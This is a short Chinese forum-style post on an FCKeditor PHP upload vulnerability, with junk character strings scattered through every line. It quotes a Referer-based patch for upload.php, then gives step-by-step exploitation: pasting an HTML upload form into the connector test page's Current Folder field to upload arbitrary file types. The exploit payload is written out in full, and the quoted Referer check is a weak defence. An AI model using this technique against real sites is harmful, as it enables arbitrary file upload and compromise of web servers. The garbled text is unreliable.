漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php5 \+ a1 t0 u3 O$ o3 R
网上给出的修复方案是
& K( u4 t6 C0 |; o: o& m2 q修复方法,删除FCK编辑器用其他的编辑器
, `9 t" K3 i* I) c6 Z6 _或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
2 A, Z5 w* `. y在
& z# G4 c8 B' t2 x7 o. x3 trequire(‘config.php’);9 A8 b$ J6 S; p8 {9 R
require(‘util.php’);
f: [+ b2 D4 P8 \' u2 w; {的下面添加以下代码—————————–
8 J; c/ z% e, R) E3 I$ F( B7 ~//防止外部提交
* `/ ?& I4 A; I: L( b- cfunction outsidepost()% P9 Z7 ~1 H! j# Y, z, y6 A7 ~0 Z0 ~
{0 Z- D2 I1 Y' X9 y- s6 j
$servername=$_SERVER['SERVER_NAME'];
7 m* l5 K0 O- u$ L7 ^- x$sub_from=@$_SERVER['HTTP_REFERER'];
2 D% _! f ~+ w$ C1 v: i$sub_len=strlen($servername);
* p9 R, a- E2 I- \$checkfrom=substr($sub_from,7,$sub_len);" T1 u& Q) F7 ^" i! N
if($checkfrom!=$servername){
# A7 G- |0 v9 L! Vecho(“you don’t outsidepost!”);: N9 S# i1 k) n8 V
exit;
h8 P. e0 B" ?/ ]( c}
% C7 u: N0 Z# \' S/ A, B}/ Q; v- P3 P/ i3 V0 y
outsidepost();
Z: Y& ?, s! N( B( t防止外部提交,但是没有防止内部提交,
* k$ i! [& F+ j利用方法:* `: V+ h0 h! t6 g* F
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html8 X& _: ~" F8 O6 m6 s; `
2,在Current Folder 框输入
7 g) l8 y! [4 j- ?9 D0 u<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form> T! j9 b5 K) J
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
3 H! `7 a. s; r3 bPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |